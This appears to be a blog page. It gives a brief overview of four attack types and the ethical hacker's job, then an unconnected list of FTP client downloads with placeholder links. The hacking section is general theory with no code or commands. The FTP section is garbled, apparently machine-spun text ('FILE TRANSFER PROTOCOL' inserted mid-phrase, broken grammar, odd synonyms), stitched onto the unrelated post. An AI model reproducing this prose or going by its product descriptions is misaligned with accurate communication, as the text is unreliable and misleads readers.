Types Of Attack:

1.Operating System Attack
2.Application level Attack
3.Shrink Wrap Code Attack
4.Misconfiguration Attack

Operating system attack is attack done on specific type of OS. Such attack is done using flaws in programs and services shipped with OS. Application level attack is done over faulty coding practices done over software during its development. Shrink Wrap Code attack are attacks done over UN-refined scripts used for making task simpler. Last is misconfiguration attack, it is kinda attack which is done over mis-configured system or a system with default settings.


Work Of An Ethical Hacker:
Job of an ethical hacker is to use all his skills and tools used by malicious hackers to find vulnerabilities in system and then provide it security against those vulnerabilities.

Conclusion: At last what I want to tell, nothing happens in clicks of buttons. A hacker is highly skilled person in field of computing who usually have ample knowledge about software, hardware, OS, networking and programming. A hacker may it be criminal or ethical has immense patience, determination, organization, discipline and persistence. An attacker may spend months of time planning, analyzing and executing an attack. This shows his level of dedication to achieve whatever goal he/she has set. A person can never become a good hacker unless he have all above qualities.

Note: Now onwards we will cover hacking as our main stream topic on this blog. Real hacking is never done over lamers who hardly knows about security, it is done over a person who is highly skilled as you are. You can never learn hacking until you do some practical and gain knowledge about field so now onwards I urge you to perform practicals that will be now posted on this blog on your own system. Next no tutorial will be taken as a lamer so they will be in possible higher details, so this may happen that you may not understand something. Rather than keeping yourself mum I plea you to please ask whenever you encounter a problem or get bothered by topic. Whenever I 'll post on hacking I 'll try to keep a theoretical and one practical tutorial, you are requested to read both and grasp matter completely.


Ace FTP


AceFTP can be said that they are the particular easiest-to-use totally free FILE TRANSFER PROTOCOL client program for shifting data files on the internet. This editors of the totally free FILE TRANSFER PROTOCOL program, Visicom Media, emphasize which AceFTP has been designed along with produced to get: control, safety, efficacy, plus simplicity.


Downlaod 

Link 1

FileZilla Client


FileZilla Client is a the majority of effective plus well-known Free FTP Clients [FILE TRANSFER PROTOCOL]  program on the market, mostly because of it’s for open source software. FileZilla Client is actually smaller, speedy, effective and also trusted. This particular can make FileZilla Client a perfect selection for several newbies with FILE TRANSFER PROTOCOL.

Downlaod 

Link 1

FILE TRANSFER PROTOCOL


It’s a quick and also safe FILE TRANSFER PROTOCOL client with regard to Mozilla Firefox plus gives you cross-platform help support, with basic words, this functions where ever Firefox functions. It is also helps SSL/TLS/SFTP protocols which might be viewed as excellent regarding Internet protection.

Downlaod

Link 1